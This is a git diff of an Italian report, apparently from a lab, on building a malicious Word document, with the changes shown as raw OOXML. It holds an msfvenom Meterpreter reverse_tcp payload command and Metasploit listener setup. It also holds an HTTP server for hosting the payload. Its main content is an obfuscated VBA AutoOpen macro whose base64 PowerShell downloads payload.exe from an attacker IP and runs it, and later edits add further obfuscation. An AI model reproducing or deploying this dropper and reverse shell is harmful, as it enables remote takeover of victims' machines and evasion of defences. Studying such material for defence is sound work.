+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LHOST</w:t>
       </w:r>
       <w:r>
         <w:t>=</w:t>
       </w:r>
-      <w:r>
-        <w:t>ipAttaccante LPORT</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ipAttaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LPORT</w:t>
       </w:r>
       <w:r>
         <w:t>=</w:t>
@@ -888,22 +2818,67 @@
         </w:rPr>
         <w:t>//</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>metto in ascolto il server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>use exploit/multi/handler</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>metto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>ascolto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/multi/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>handler</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set PAYLOAD windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -913,16 +2888,25 @@
         <w:t>L</w:t>
       </w:r>
       <w:r>
-        <w:t>HOST ipAttaccante</w:t>
-      </w:r>
+        <w:t xml:space="preserve">HOST </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ipAttaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">set LPORT </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>porta</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -939,12 +2923,100 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>// metto in ascolto un altro server per permettere di scaricare il payload malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>python -m http.server 8000</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>metto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>ascolto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>altro</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>permettere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">python -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8000</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -967,10 +3039,79 @@
         <w:t>La</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> vittima è una macchina Windows con Windows Defender disabilitato e con pacchetto Office installato</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (per permettere l’apertura del document Word malevolo)</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vittima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> è </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Windows con Windows Defender </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>disabilitato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e con </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pacchetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Office </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>installato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>permettere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>l’apertura</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del document Word </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2300,27 +4441,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -2561,33 +4681,28 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -2604,4 +4719,30 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -2415,6 +2415,332 @@
         <w:t xml:space="preserve"> OFFUSCATO</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nel </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>offuscato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inserito</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> solo il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>principale</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (AutoOpen) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> al </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decodificatore</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>direttamente</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in base64, in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>questo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> modo ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>potuto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>eliminare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>responsabili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>delle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>offuscare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> VBA Obfuscator.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AutoOpen(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim v38d2edd4076bb66acc2ee1b42bdb2336 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim vr4573k99768ffgruighfjkgbgvghjjhg As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim ca9d601c97cef483411de079bb9a3419b As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim m758f0834b3c6499700addb9b25f64906 As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Set m758f0834b3c6499700addb9b25f64906 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VBA.CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WScript.Shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336 = "IEX([</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>System.Text.Encoding</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">vr4573k99768ffgruighfjkgbgvghjjhg = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xjcmlzdFxEb3dubG9hZHNcdmlydXMuZXhlJyk=")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">ca9d601c97cef483411de079bb9a3419b = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "ICYgJ0M6XFVzZXJzXGNyaXN0XERvd25sb2Fkc1x2aXJ1cy5leGUn")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>m758f0834b3c6499700addb9b25f64906.Run "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>m758f0834b3c6499700addb9b25f64906.Run "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Set m758f0834b3c6499700addb9b25f64906 = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -2816,6 +3142,7 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>//</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -72,7 +72,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="2880" w:firstLine="720"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
@@ -83,7 +83,7 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">              Email</w:t>
+        <w:t>Email</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2593,7 +2593,58 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> VBA Obfuscator.</w:t>
+        <w:t xml:space="preserve"> VBA Obfuscator</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> e ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>diviso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aumentare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>confusione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2626,6 +2677,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>Dim jytfk6877hnhhjj89ong6rbgfghj66879 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Dim m758f0834b3c6499700addb9b25f64906 As Object</w:t>
       </w:r>
     </w:p>
@@ -2652,6 +2708,30 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">jytfk6877hnhhjj89ong6rbgfghj66879 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>= "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
